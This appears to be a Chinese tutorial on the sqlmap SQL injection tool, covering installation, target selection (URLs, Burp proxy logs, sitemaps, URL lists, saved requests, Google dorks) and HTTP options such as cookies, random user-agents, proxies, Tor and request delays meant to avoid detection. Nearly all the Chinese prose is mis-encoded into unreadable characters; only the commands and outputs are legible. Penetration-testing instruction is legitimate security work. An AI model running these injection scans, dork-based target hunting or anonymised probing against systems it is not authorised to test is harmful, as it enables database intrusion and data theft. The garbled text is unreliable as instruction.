涓€銆丼qlmap鏄粈涔?/h3>
Sqlmap鏄紑婧愮殑鑷姩鍖朣QL娉ㄥ叆宸ュ叿锛岀敱Python鍐欐垚锛屽叿鏈夊涓嬬壒鐐癸細
- 瀹屽叏鏀寔MySQL銆丱racle銆丳ostgreSQL銆丮icrosoft SQL Server銆丮icrosoft Access銆両BM DB2銆丼QLite銆丗irebird銆丼ybase銆丼AP MaxDB銆丠SQLDB鍜孖nformix绛夊绉嶆暟鎹簱绠$悊绯荤粺銆?/li>
- 瀹屽叏鏀寔甯冨皵鍨嬬洸娉ㄣ€佹椂闂村瀷鐩叉敞銆佸熀浜庨敊璇俊鎭殑娉ㄥ叆銆佽仈鍚堟煡璇㈡敞鍏ュ拰鍫嗘煡璇㈡敞鍏ャ€?/li>
- 鍦ㄦ暟鎹簱璇佷功銆両P鍦板潃銆佺鍙e拰鏁版嵁搴撳悕绛夋潯浠跺厑璁哥殑鎯呭喌涓嬫敮鎸佷笉閫氳繃SQL娉ㄥ叆鐐硅€岀洿鎺ヨ繛鎺ユ暟鎹簱銆?/li>
- 鏀寔鏋氫妇鐢ㄦ埛銆佸瘑鐮併€佸搱甯屻€佹潈闄愩€佽鑹层€佹暟鎹簱銆佹暟鎹〃鍜屽垪銆?/li>
- 鏀寔鑷姩璇嗗埆瀵嗙爜鍝堝笇鏍煎紡骞堕€氳繃瀛楀吀鐮磋В瀵嗙爜鍝堝笇銆?/li>
- 鏀寔瀹屽叏鍦颁笅杞芥煇涓暟鎹簱涓殑鏌愪釜琛紝涔熷彲浠ュ彧涓嬭浇鏌愪釜琛ㄤ腑鐨勬煇鍑犲垪锛岀敋鑷冲彧涓嬭浇鏌愪竴鍒椾腑鐨勯儴鍒嗘暟鎹紝杩欏畬鍏ㄥ彇鍐充簬鐢ㄦ埛鐨勯€夋嫨銆?/li>
- 鏀寔鍦ㄦ暟鎹簱绠$悊绯荤粺涓悳绱㈡寚瀹氱殑鏁版嵁搴撳悕銆佽〃鍚嶆垨鍒楀悕
- 褰撴暟鎹簱绠$悊绯荤粺鏄疢ySQL銆丳ostgreSQL鎴朚icrosoft SQL Server鏃舵敮鎸佷笅杞芥垨涓婁紶鏂囦欢銆?/li>
- 褰撴暟鎹簱绠$悊绯荤粺鏄疢ySQL銆丳ostgreSQL鎴朚icrosoft SQL Server鏃舵敮鎸佹墽琛屼换鎰忓懡浠ゅ苟鍥炵幇鏍囧噯杈撳嚭銆?/li>
浜屻€佸畨瑁匰qlmap
Sqlmap鐨勫紑婧愰」鐩紝鎵樼鍦╣ithub锛屾渶绠€鍗曠殑瀹夎鏂瑰紡渚挎槸浣跨敤git锛屾墽琛屽涓嬪懡浠わ細git clone https://github.com/sqlmapproject/sqlmap.git
- 1
- 2
涓夈€佽緭鍑虹骇鍒?Output verbosity)
鍙傛暟锛?v
Sqlmap鐨勮緭鍑轰俊鎭寜浠庣畝鍒扮箒鍏卞垎涓?涓骇鍒紙鍜岃懌鑺﹀▋涓€鏍峰锛夛紝渚濇涓?銆?銆?銆?銆?銆?鍜?銆備娇鐢ㄥ弬鏁扳€?v <绾у埆>鈥濇潵鎸囧畾鏌愪釜绛夌骇锛屽浣跨敤鍙傛暟鈥?v 6鈥濇潵鎸囧畾杈撳嚭绾у埆涓?銆傞粯璁よ緭鍑虹骇鍒负1銆傚悇涓緭鍑虹骇鍒殑鎻忚堪濡備笅锛?
- 0锛氬彧鏄剧ずPython鐨則racebacks淇℃伅銆侀敊璇俊鎭痆ERROR]鍜屽叧閿俊鎭痆CRITICAL]锛?/li>
- 1锛氬悓鏃舵樉绀烘櫘閫氫俊鎭痆INFO]鍜岃鍛婁俊鎭痆WARNING]锛?/li>
- 2锛氬悓鏃舵樉绀鸿皟璇曚俊鎭痆DEBUG]锛?/li>
- 3锛氬悓鏃舵樉绀烘敞鍏ヤ娇鐢ㄧ殑鏀诲嚮鑽疯浇锛?/li>
- 4锛氬悓鏃舵樉绀篐TTP璇锋眰锛?/li>
- 5锛氬悓鏃舵樉绀篐TTP鍝嶅簲澶达紱
- 6锛氬悓鏃舵樉绀篐TTP鍝嶅簲浣撱€?/li>
鍥涖€佹寚瀹氱洰鏍?/h3>
Sqlmap杩愯鏃跺繀椤绘寚瀹氳嚦灏戜竴涓洰鏍囷紝鏀寔涓€娆℃寚瀹氬涓洰鏍囥€傛湁浠ヤ笅鍑犵鎸囧畾鐩爣鐨勬柟寮忥細
1.鐩存帴杩炴帴鏁版嵁搴?
鍙傛暟锛?d
浣跨敤鍙傛暟鈥?d鈥濈洿鎺ヨ繛鎺ユ暟鎹簱锛岃鍙傛暟鍚庤窡涓€涓〃绀烘暟鎹簱鐨勫瓧绗︿覆锛岃瀛楃涓叉湁浠ヤ笅涓ょ鏍煎紡锛?
(1).褰撴暟鎹簱绠$悊绯荤粺鏄疢ySQL銆丱racle銆丮icrosoft SQL Server鎴朠ostgreSQL绛夋椂鏍煎紡涓猴細
DBMS://USER:[email聽protected]_IP:DBMS_PORT/DATABASE_NAME
DBMS://DATABASE_FILEPATH
python sqlmap.py -d "mysql://root:[email聽protected]:3306/DISSchool"
[CRITICAL] sqlmap requires 'python-pymysql' third-party library in order to directly connect to the DBMS 'MySQL'. You can download it from 'https://github.com/petehunt/PyMySQL/'. Alternative is to use a package 'python-sqlalchemy' with support for dialect 'mysql' installed
git clone https://github.com/petehunt/PyMySQL/
cd PyMySQL/
sudo python setup.py install
python sqlmap.py -d "mysql://root:[email聽protected]:3306/DISSchool"
杩欐娌℃湁鎶ラ敊锛屾垚鍔熺殑杩炴帴鍒颁簡鏁版嵁搴撱€傚彧鏄櫎浜嗘娴嬫暟鎹簱纭疄鏄疢ysql鐗堟湰鍙峰ぇ浜庣瓑浜?.0.0涔嬪渚夸粈涔堥兘娌℃湁鍋氥€傝Sqlmap鍋氱偣浠€涔堥渶瑕佺敤鍏朵粬鍙傛暟鎸囧畾锛岃繖浜涘弬鏁版垜浠◢鏅氫簺鍐嶅涔犮€?
2.鎸囧畾鐩爣URL
鍙傛暟锛?u 鎴?鈥搖rl
浣跨敤鍙傛暟鈥?u鈥濇垨鈥溾€搖rl鈥濇寚瀹氫竴涓猆RL浣滀负鐩爣锛岃鍙傛暟鍚庤窡涓€涓〃绀篣RL鐨勫瓧绗︿覆锛屽彲浠ユ槸http鍗忚涔熷彲浠ユ槸https鍗忚锛岃繕鍙互鎸囧畾绔彛锛屽锛?
python sqlmap.py -u 鈥渉ttp://192.168.56.102:8080/user.php?id=0鈥?
3.浠嶣urp鎴朩ebScarab鐨勪唬鐞嗘棩蹇椾腑瑙f瀽鐩爣
鍙傛暟锛?l
浣跨敤鍙傛暟鈥?l鈥濇寚瀹氫竴涓狟urp鎴朩ebScarab鐨勪唬鐞嗘棩蹇楁枃浠讹紝Sqlmap灏嗕粠鏃ュ織鏂囦欢涓В鏋愬嚭鍙兘鐨勬敾鍑荤洰鏍囷紝骞堕€愪釜灏濊瘯杩涜娉ㄥ叆銆傝鍙傛暟鍚庤窡涓€涓〃绀烘棩蹇楁枃浠剁殑璺緞銆?
WebScarab鎴戞病鏈夌敤杩囷紝Burp鍊掓槸甯稿父浼氱敤銆侭urp榛樿涓嶈褰曟棩蹇楋紝鎯宠璁板綍鏃ュ織闇€瑕佹墜鍔ㄥ紑鍚紝璁剧疆鏂规硶濡備笅鍥炬墍绀猴細
鍙敤鍕鹃€変唬鐞嗕腑鐨勮姹傛暟鎹氨瓒冲浜嗭紝鏃ュ織鏂囦欢璺緞鍙殢鎰忚缃紝杩欓噷鎴戣缃棩蹇楁枃浠跺悕涓簆roxy.log锛屾斁鍦ㄧ敤鎴蜂富鐩綍涓€?
璁剧疆娴忚鍣ㄧ殑浠g悊涓築urp锛岄殢渚挎祻瑙堝嚑涓綉椤靛悗鍙戠幇proxy.log绔熺劧宸茬粡鏈?0澶欿澶э紝鏌ョ湅鍏跺唴瀹癸紝閮ㄥ垎杈撳嚭濡備笅锛?
[email聽protected]:~$ more proxy.log ====================================================== 7:22:52 PM http://ocsp.digicert.com:80 [117.18.237.29] ====================================================== POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,**;q=0.8 鈥?
鍙互鐪嬪埌璇ユ棩蹇楁枃浠朵笉浠呰褰曚簡GET鍙傛暟锛岃繕璁板綍浜哻ookie鍜孭OST鍙傛暟銆傜幇鍦ㄤ娇鐢ㄥ涓嬪懡浠よSqlmap瑙f瀽璇ユ棩蹇楁枃浠讹紝鑷姩瀵绘壘鐩爣锛屾娴嬫敞鍏ユ紡娲烇細
python sqlmap.py -l ../proxy.log
娉ㄦ剰鏃ュ織鏂囦欢鐨勮矾寰勮鍐欐纭€傛墽琛岃鍛戒护鏃讹紝姣忔壘鍒颁竴涓彲鑳界殑鏀诲嚮鐩爣锛孲qlmap閮戒細璇㈤棶鏄惁瑕佹娴嬭鐩爣銆傦紝榛樿鍥炵瓟涓衡€淵鈥濓紝鎯宠娴嬭瘯璇ョ洰鏍囷紝鐩存帴鎸夊洖杞﹂敭灏辫銆?
褰撴棩蹇楄緝澶ф椂浼氭湁寰堝鍙兘鐩爣锛岃櫧鐒舵湁璇㈤棶鏈哄埗浣嗕緷鏃ч夯鐑︼紝鍥犱负涓嶈兘涓€璺寜鍥炶溅鑰岃杩涜鍒ゆ柇銆傝嫢鏄彲浠ュ鏃ュ織杩涜杩囨护灏卞ソ浜嗭紒纭疄鏄彲浠ョ殑锛屽弬鏁颁负鈥溾€搒cope鈥濓紝璇︽儏瑙佲€滀簲.18鈥濄€?
4.浠庣珯鐐瑰湴鍥炬枃浠朵腑瑙f瀽鐩爣
鍙傛暟锛?x
涓轰究浜庢悳绱㈠紩鎿庢敹褰曪紝璁稿缃戠珯涓撻棬涓烘悳绱㈠紩鎿庣敓鎴愪簡xml鏍煎紡鐨勭珯鐐瑰湴鍥撅紝濡傜櫨搴itemap鏀寔xml鏍煎紡銆係qlmap鍙互鐩存帴瑙f瀽xml鏍煎紡鐨勭珯鐐瑰湴鍥撅紝浠庝腑鎻愬彇鏀诲嚮鐩爣锛屽涓€涓綉绔欏叏鏂逛綅鏃犳瑙掑湴杩涜娉ㄥ叆妫€娴嬶紝姝ゆ椂浣跨敤鐨勫弬鏁版槸鈥?x鈥濓紝濡傦細
python sqlmap.py -x http://www.6eat.com/sitemap.xml
浣嗘墽琛岃鍛戒护鐨勭粨鏋滃嵈鏄細
[WARNING] no usable links found (with GET parameters)
娌℃湁鎵惧埌鏈塆ET鍙傛暟鐨勫彲鐢ㄩ摼鎺ャ€傚氨鎴戞湁闄愮殑缁忛獙鑰岃█锛岀珯鐐瑰湴鍥句腑鐨刄RL寰堝皯鍖呭惈GET鍙傛暟锛孭OST鍙傛暟灏辨洿涓嶇敤璇翠簡銆傛墍浠qlmap鐨勮繖涓€鍔熻兘浼间箮鏈変簺楦¤倠銆?
5.浠庢枃鏈枃浠朵腑瑙f瀽鐩爣
鍙傛暟锛?m
鍙傛暟鈥?u鈥濅竴娆″彧鑳芥寚瀹氫竴涓猆RL锛岃嫢鏈夊涓猆RL闇€瑕佹祴璇曞氨鏄惧緱寰堜笉鏂逛究锛屾垜浠彲鐢ㄥ皢澶氫釜URL浠ヤ竴琛屼竴涓殑鏍煎紡淇濆瓨鍦ㄦ枃鏈枃浠朵腑锛岀劧鍚庝娇鐢ㄥ弬鏁扳€?m鈥濓紝鍚庤窡璇ユ枃鏈枃浠惰矾寰勶紝璁㏒qlmap渚濇璇诲彇鏂囦欢涓殑URL浣滀负鏀诲嚮鐩爣銆?
濡傛垜浠湁鏂囦欢url.txt锛屽唴瀹逛负锛?
www.target1.com/vuln1.php?q=foobar
www.target2.com/vuln2.asp?id=1
www.target3.com/vuln3/id/1*
鐒跺悗鍙敤浣跨敤濡備笅鍛戒护璁㏒qlmap娴嬭瘯杩欎簺URL鏄惁瀛樺湪娉ㄥ叆婕忔礊锛?
python sqlmap.py -m url.txt
鍚屾牱,鎵ц璇ュ懡浠ゆ椂锛孲qlmap浼氬緢璐村績鍦颁竴涓釜璇㈤棶锛氣€渄o you want to test this URL?鈥?
6.浠庢枃浠惰浇鍏TTP璇锋眰
鍙傛暟锛?r
鍙互灏嗕竴涓狧TTP璇锋眰淇濆瓨鍦ㄦ枃浠朵腑锛岀劧鍚庝娇鐢ㄥ弬鏁扳€?r鈥濆姞杞借鏂囦欢锛孲qlmap浼氳В鏋愯鏂囦欢锛屼粠璇ユ枃浠跺垎鏋愮洰鏍囧苟杩涜娴嬭瘯銆?
璁炬湁濡備笅鎵€绀虹殑HTTP璇锋眰淇濆瓨鍦ㄦ枃浠秅et.txt涓細
GET /user.php?id=1 HTTP/1.1
Host: 192.168.56.101:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-SG,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
鍒欎娇鐢ㄥ涓嬪懡浠よSqlmap瑙f瀽璇ユ枃浠讹紝浠ヨ鏂囦欢涓璈TTP璇锋眰鐩爣涓烘敾鍑荤洰鏍囪繘琛屾祴璇曪細
python sqlmap.py -r get.txt
7.灏咷oogle鎼滅储缁撴灉浣滀负鏀诲嚮鐩爣
鍙傛暟锛?g
Sqlmap鑳借嚜鍔ㄨ幏鍙朑oogle鎼滅储鐨勫墠涓€鐧句釜缁撴灉锛屽鍏朵腑鏈塆ET鍙傛暟鐨刄RL杩涜娉ㄥ叆娴嬭瘯銆傚綋鐒讹紝鎵€澶勭殑缃戠粶鐜瑕佽兘璁块棶Google鎵嶈銆備笅闈㈡槸Sqlmap鎵嬪唽涓€?g鈥濆弬鏁扮殑渚嬪瓙锛?
python sqlmap.py -g 鈥渋nurl:\鈥?php?id=1\鈥?鈥?
8.浠庨厤缃枃浠朵腑杞藉叆鏀诲嚮鐩爣
鍙傛暟锛?c
浣跨敤鍙傛暟鈥?c鈥濇寚瀹氫竴涓厤缃枃浠讹紙濡傦細sqlmap.conf锛夛紝Sqlmap浼氳В鏋愯閰嶇疆鏂囦欢锛屾寜鐓ц閰嶇疆鏂囦欢鐨勯厤缃墽琛屽姩浣溿€傞厤缃枃浠朵腑鍙互鎸囧畾鏀诲嚮鐩爣锛屽疄闄呬笂闄や簡鏀诲嚮鐩爣澶栵紝閰嶇疆鏂囦欢杩樺彲浠ユ寚瀹氬悇绉嶅弬鏁扮殑鍊笺€?
Sqlmap鐨勬寜鐓х洰褰曚腑鏈変竴涓悕涓簊qlmap.conf鐨勬枃浠讹紝璇ユ枃浠舵槸閰嶇疆鏂囦欢鐨勬ā鏉匡紝鐪嬬湅璇ユ枃浠跺唴瀹癸紝灏辫兘鏄庣櫧閰嶇疆鏂囦欢鏄粈涔堟剰鎬濅簡銆?
浜斻€佽姹?/h3>
HTTP鏄竴涓鏉傜殑鍗忚銆侶TTP璇锋眰鏈夊緢澶氱鏂规硶锛坢ethod锛夛紝鍙互鍦ㄤ笉鍚屼綅缃紙GET銆丳OST銆乧ookie鍜孶ser-Agent绛夛級鎼哄甫涓嶅悓鍙傛暟銆傚線寰€鍙湁鍦ㄧ壒瀹氫綅缃惡甯︿簡鐗瑰畾鍙傛暟浠ョ壒瀹氭柟娉曞彂璧风殑璇锋眰鎵嶆槸鍚堟硶鏈夋晥鐨勮姹傘€係qlmap杩愯鏃堕櫎浜嗛渶瑕佹寚瀹氱洰鏍囷紝鏈夋椂杩橀渶瑕佹寚瀹欻TTP璇锋眰鐨勪竴浜涚粏鑺傘€備笅闈㈣繖浜涘弬鏁伴兘鐢ㄤ簬鎸囧畾HTTP璇锋眰缁嗚妭銆?
1.HTTP鏂规硶
鍙傛暟锛氣€搈ethod
涓€鑸潵璇达紝Sqlmap鑳借嚜鍔ㄥ垽鏂嚭鏄娇鐢℅ET鏂规硶杩樻槸POST鏂规硶锛屼絾鍦ㄦ煇浜涙儏鍐典笅闇€瑕佺殑鍙兘鏄疨UT绛夊緢灏戣鐨勬柟娉曪紝姝ゆ椂灏遍渶瑕佺敤鍙傛暟鈥溾€搈ethod鈥濇潵鎸囧畾鏂规硶銆傚锛氣€溾€搈ethod=PUT鈥濄€?
2.POST鏁版嵁
鍙傛暟锛氣€揹ata
璇ュ弬鏁版寚瀹氱殑鏁版嵁浼氳浣滀负POST鏁版嵁鎻愪氦锛孲qlmap涔熶細妫€娴嬭鍙傛暟鎸囧畾鏁版嵁鏄惁瀛樺湪娉ㄥ叆婕忔礊銆傚锛?
python sqlmap.py -u 鈥渉ttp://192.168.56.102:8080/user.php鈥?鈥揹ata=鈥漣d=0&name=werner鈥?
3.鎸囧畾鍒嗛殧绗?
鍙傛暟锛氣€損aram-del
涓婁竴涓緥瀛愪腑鈥溾€揹ata鈥濈殑鏁版嵁鈥渋d=0&name=werner鈥濆叾瀹炵敱涓や釜閮ㄥ垎缁勬垚锛氣€渋d=0鈥濆拰鈥渘ame=werner鈥濓紝榛樿鍦颁互鈥?amp;鈥濅綔涓哄垎闅旂銆傛垜浠彲浠ヤ娇鐢ㄢ€溾€損aram-del鈥濇潵鎸囧畾鍒嗛殧绗︼紝濡傦細
python sqlmap.py -u 鈥渉ttp://192.168.56.102:8080/user.php鈥?鈥揹ata=鈥漣d=0;name=werner鈥?鈥損aram-del=鈥?鈥?
4.cookie
鍙傛暟锛氣€揷ookie銆佲€揷ookie-del銆佲€揹rop-set-cookie鍜屸€搇oad-cookies
鏈変袱绉嶆儏鍐典細鐢ㄥ埌杩欎簺鍙傛暟锛?
- 瑕佹祴璇曠殑椤甸潰鍙湁鍦ㄧ櫥褰曠姸鎬佷笅鎵嶈兘璁块棶锛岀櫥褰曠姸鎬佺敤cookie璇嗗埆
- 鎯宠妫€娴嬫槸鍚﹀瓨鍦╟ookie娉ㄥ叆
褰撯€溾€搇evel鈥濊缃负2鎴栨洿楂樻椂锛孲qlmap浼氭娴媍ookie鏄惁瀛樺湪娉ㄥ叆婕忔礊锛屽叧浜庘€溾€搇evel鈥濈殑鏇村淇℃伅瑙佷笅鏂囥€?
(1).鈥溾€揷ookie鈥濆拰鈥溾€揷ookie-del鈥?
鍦ㄦ祻瑙堝櫒涓櫥褰曠洰鏍囩綉绔欏悗澶嶅埗鍑虹淮鎸佺櫥褰曠姸鎬佺殑cookie锛岀敤鍙傛暟鈥溾€揷ookie鈥濇潵鎸囧畾杩欎簺cookie锛屽锛?
python sqlmap.py -u "http://192.168.56.102:8080/user.php" --cookie "JSESSIONID=E5D6C8C81;NAME=werner;"
涓嶱OST鍙傛暟涓嶅悓锛宑ookie榛樿鐨勫垎闅旂涓衡€?鈥濓紝鎯宠鎸囧畾cookie涓殑鍒嗛殧绗︼紝浣跨敤鍙傛暟鈥溾€揷ookie-del鈥濄€?
(2).鈥溾€揹rop-set-cookie鈥?
鑻TTP鍝嶅簲澶翠腑鏈夆€淪et-Cookie鈥濓紝Sqlmap浼氳嚜鍔ㄨ缃€淪et-Cookie鈥濊缃殑cookie锛屽苟瀵硅繖浜沜ookie杩涜妫€娴嬨€傝嫢涓嶆兂璁㏒qlmap杩欎箞鍋氾紝娣诲姞鍙傛暟鈥溾€揹rop-set-cookie鈥濆嵆鍙紝杩欐牱锛孲qlmap浼氬拷鐣モ€淪et-Cookie鈥濄€?
(3).鈥溾€搇oad-cookies鈥?
璇ュ弬鏁扮敤浜庝粠鏂囦欢涓浇鍏etscape鎴杦get鏍煎紡鐨刢ookie銆?
wget鍙互淇濆瓨鍜岃浇鍏ookie锛岀ず渚嬪涓嬶細
# Log in to the server. This can be done only once.
wget 鈥搒ave-cookies cookies.txt \
鈥損ost-data 鈥榰ser=foo&password=bar鈥?\
http://server.com/auth.php
# Now grab the page or pages we care about.
wget 鈥搇oad-cookies cookies.txt \
-p http://server.com/interesting/article.php
5.User-Agent
鍙傛暟锛氣€搖ser-agent鍜屸€搑andom-agent
榛樿鎯呭喌涓婼qlmap鍙戦€佺殑HTTP璇锋眰涓殑User-Agent鍊间负锛?
sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org)
浣跨敤鍙傛暟鈥溾€搖ser-agent鈥濆彲浠ユ寚瀹氫竴涓猆ser-Agent鍊笺€備絾姝e父鐨刄ser-Agent鍊奸暱浠€涔堟牱鎴戜滑鍙兘骞朵笉璁板緱锛屾墍浠ユ湁浜嗗弬鏁扳€溾€搑andom-agent鈥濓紝浣跨敤璇ュ弬鏁帮紝Sqlmap浼氫粠鏂囦欢./txt/user-agents.txt涓殢鏈哄湴鍙栦竴涓猆ser-Agent銆傛敞鎰忥紝鍦ㄤ竴娆′細璇濅腑鍙湁浣跨敤鍚屼竴涓猆ser-Agent锛屽苟涓嶆槸姣忓彂涓€涓狧TTP璇锋眰鍖咃紝閮介殢鏈轰竴涓猆ser-Agent銆?
鐢ㄥ涓嬪懡浠ょ粺璁ser-agents.txt琛屾暟锛?
cat sqlmap/txt/user-agents.txt | wc -l
缁撴灉涓?211锛屽綋鐒跺叾涓繕鍖呭惈绌鸿銆佹敞閲婄瓑锛屼絾鎬荤殑鏉ヨ璇ユ枃浠朵腑瀛樺偍鐨刄ser-Agent涔熸湁4鍗冨涓€?
褰撯€溾€搇evel鈥濊缃负3鎴栨洿楂樻椂锛孲qlmap浼氭娴婾ser-Agent鏄惁瀛樺湪娉ㄥ叆婕忔礊锛屽叧浜庘€溾€搇evel鈥濈殑鏇村淇℃伅瑙佷笅鏂囥€?
6.Host
鍙傛暟锛氣€揾ost
浣跨敤璇ュ弬鏁板彲浠ユ墜鍔ㄦ寚瀹欻TTP澶翠腑鐨凥ost鍊笺€?
褰撯€溾€搇evel鈥濊缃负5鎴栨洿楂樻椂锛孲qlmap浼氭娴婬ost鏄惁瀛樺湪娉ㄥ叆婕忔礊锛屽叧浜庘€溾€搇evel鈥濈殑鏇村淇℃伅瑙佷笅鏂囥€?
7.Referer
鍙傛暟锛氣€搑eferer
浣跨敤璇ュ弬鏁板彲浠ユ寚瀹欻TTP澶翠腑鐨凴eferer鍊笺€係qlmap鍙戦€佺殑HTTP璇锋眰澶撮儴榛樿鏃燫eferer瀛楁銆?
褰撯€溾€搇evel鈥濊缃负3鎴栨洿楂樻椂锛孲qlmap浼氭娴婻eferer鏄惁瀛樺湪娉ㄥ叆婕忔礊锛屽叧浜庘€溾€搇evel鈥濈殑鏇村淇℃伅瑙佷笅鏂囥€?
8.棰濆鐨凥TTP澶?
鍙傛暟锛氣€揾eaders
浣跨敤璇ュ弬鏁板彲浠ュ湪Sqlmap鍙戦€佺殑HTTP璇锋眰鎶ユ枃澶撮儴娣诲姞瀛楁锛岃嫢娣诲姞澶氫釜瀛楁锛岀敤鈥淺n鈥濆垎闅斻€傚鍛戒护锛?
python sqlmap.py -u "http://192.168.56.101:8080/" -v 5 --headers "X-A:A\nX-B: B"
GET / HTTP/1.1
X-B: B
Host: 192.168.56.101:8080
Accept-encoding: gzip,deflate
X-A: A
Accept: */*
User-agent: sqlmap/1.1.10#stable (http://sqlmap.org)
Connection: close
鍔犲弬鏁扳€?v 5鈥濇槸涓轰簡璁㏒qlamp杈撳嚭鍙戦€佺殑HTTP璇锋眰鍖咃紝渚夸簬鎴戜滑瑙傚療銆?
9.韬唤璁よ瘉
鍙傛暟锛氣€揳uth-type鍜屸€揳uth-cred
杩欎簺鍙傛暟鐢ㄤ簬杩涜韬唤璁よ瘉銆傗€溾€揳uth-type鈥濈敤浜庢寚瀹氳璇佹柟寮忥紝鏀寔浠ヤ笅涓夌韬唤璁よ瘉鏂瑰紡锛?
- Basic
- Digest
- NTLM
鈥溾€揳uth-cred鈥濈敤浜庣粰鍑鸿韩浠借璇佺殑鍑瘉锛屾牸寮忔槸鈥渦sername:password鈥濄€?
濡傦細
python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass"
10.鍩轰簬璇佷功鐨勮韩浠借璇?
鍙傛暟锛氣€揳uth-file
鑻eb鏈嶅姟鍣ㄨ姹傚鎴风鎻愪緵璇佷功鍒欏彲浠ヤ娇鐢ㄦ鍙傛暟鎸囧畾涓€涓狿EM鏍煎紡鐨勮瘉涔︽枃浠躲€傛垜浠煡閬揝SL鍗忚鐨勫鎴风璁よ瘉鏄彲閫夌殑锛屽疄璺典腑涓€鑸兘鍙敤鏈嶅姟鍣ㄧ鎻愪緵鑷繁鐨勮瘉涔︿緵瀹㈡埛绔獙璇侊紝寰堝皯瑕佹眰瀹㈡埛绔彁渚涜嚜宸辩殑璇佷功銆?
11.蹇界暐401
鍙傛暟锛氣€搃gnore-401
浣跨敤璇ュ弬鏁板拷鐣?01閿欒锛堟湭璁よ瘉锛夈€?
12.HTTP(S)浠g悊
鍙傛暟锛氣€損roxy銆佲€損roxy-cred銆佲€損roxy-file鍜屸€搃gnore-proxy
浣跨敤鍙傛暟鈥溾€損roxy鈥濇潵璁剧疆涓€涓狧TTP(S)浠g悊锛屾牸寮忔槸鈥渉ttp(s)://url:port鈥濄€傝嫢浠g悊闇€瑕佽璇侊紝浣跨敤鍙傛暟鈥溾€損roxy-cred鈥濇潵鎻愪緵璁よ瘉鍑瘉锛屾牸寮忔槸鈥渦sername:password鈥濄€?
浣跨敤鍙傛暟鈥溾€損roxy-file鈥濇寚瀹氫竴涓瓨鍌ㄧ潃浠g悊鍒楄〃鐨勬枃浠讹紝Sqlmap浼氫緷娆′娇鐢ㄦ枃浠朵腑鐨勪唬鐞嗭紝褰撴煇涓唬鐞嗘湁浠讳綍杩炴帴闂鏃跺氨浼氳寮冪敤鑰屾崲涓嬩竴涓唬鐞嗐€?
浣跨敤鍙傛暟鈥溾€搃gnore-proxy鈥濆拷鐣ユ湰鍦颁唬鐞嗚缃€?
13.Tor鍖垮悕缃戠粶
鍙傛暟锛氣€搕or銆佲€搕or-type銆佲€搕or-port鍜屸€揷heck-tor
涓嶇鍑轰簬浠€涔堝師鍥狅紝濡傛灉鎯宠淇濇寔鍖垮悕鐘舵€佷笌鍏朵娇鐢ㄥ崟涓殑HTTP(S)浠g悊锛屼笉濡傚畨瑁呯被浼糚rivoxy杩欐牱鐨勮蒋浠舵寜鐓or鐨勫畨瑁呮寚瀵奸厤缃竴涓猅or瀹㈡埛绔€傝缃ソ鍚庝娇鐢ㄥ弬鏁扳€溾€搕or鈥濊Sqlmap鑷姩璁剧疆浣跨敤Tor浠g悊銆?
濡傛灉鎯宠鎵嬪姩鎸囧畾Tor鐨勭被鍨嬪拰绔彛鍙互浣跨敤鍙傛暟鈥溾€搕or-type鈥濆拰鈥溾€搕or-port鈥濓紝濡傦細
--tor-type=SOCKS5 --tor-port 9050
濡傛灉瑕佹眰楂樺害鐨勫尶鍚嶆€у彲浠ヤ娇鐢ㄥ弬鏁扳€溾€揷heck-tor鈥濓紝鍔犱笂璇ュ弬鏁板悗Sqlmap浼氱‘淇濇墍鏈夋祦閲忛兘璧癟or浠g悊锛岃嫢Tor浠g悊澶辨晥锛孲qlmap浼氬彂鍑鸿鍛婂苟閫€鍑恒€傛娴嬫柟娉曟槸璁块棶Are you using Tor?銆?
14.HTTP璇锋眰涔嬮棿娣诲姞寤惰繜
鍙傛暟锛氣€揹elay
杩囦簬棰戠箒鍦板彂閫佽姹傚彲鑳戒細琚綉绔欏療瑙夋垨鏈夊叾浠栦笉鑹悗鏋溿€備娇鐢ㄥ弬鏁扳€溾€揹elay鈥濇潵鎸囧畾HTTP璇锋眰涔嬮棿鐨勫欢杩燂紝鍗曚綅涓虹锛岀被鍨嬫槸娴偣鏁帮紝濡傗€溾€揹elay 1.5鈥濊〃绀哄欢杩?.5绉掋€傞粯璁ゆ槸娌℃湁寤惰繜鐨勩€?
15.瓒呮椂
鍙傛暟锛氣€搕imeout
瓒呮椂鏃堕棿榛樿涓?0绉掞紝鍙互鐢ㄥ弬鏁扳€溾€搕imeout鈥濇寚瀹氳秴鏃舵椂闂达紝濡傗€溾€搕imeout 44.5鈥濊〃绀鸿缃秴鏃舵椂闂翠负44.5绉掋€?
16.瓒呮椂鍚庢渶澶ч噸璇曟鏁?
鍙傛暟锛氣€搑etries
瓒呮椂鍚嶴qlmap浼氳繘琛岄噸璇曪紝鏈€澶ч噸璇曟鏁伴粯璁や负3锛屽彲浠ョ敤鍙傛暟鈥溾€搑etries鈥濇寚瀹氭渶澶ч噸璇曟鏁般€?
17.闅忔満鍖栧弬鏁板€?
鍙傛暟锛氣€搑andomize
浣跨敤璇ュ弬鏁帮紝Sqlmap浼氶殢鏈虹敓鎴愭瘡娆TTP璇锋眰涓弬鏁扮殑鍊硷紝鍊肩殑绫诲瀷鍜岄暱搴︿緷鐓т簬鍘熷鍊笺€?
18.鐢ㄦ鍒欒〃杈惧紡杩囨护浠g悊鏃ュ織
鍙傛暟锛氣€搒cope
鎸囧畾涓€涓狿ython姝e垯琛ㄨ揪寮忓浠g悊鏃ュ織杩涜杩囨护锛屽彧娴嬭瘯绗﹀悎姝e垯琛ㄨ揪寮忕殑鐩爣锛屽锛?
python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"
19.閬垮厤閿欒璇锋眰杩囧鑰岃灞忚斀
鍙傛暟锛氣€搒afe-url銆佲€搒afe-post銆佲€搒afe-req鍜屸€搒afe-freq
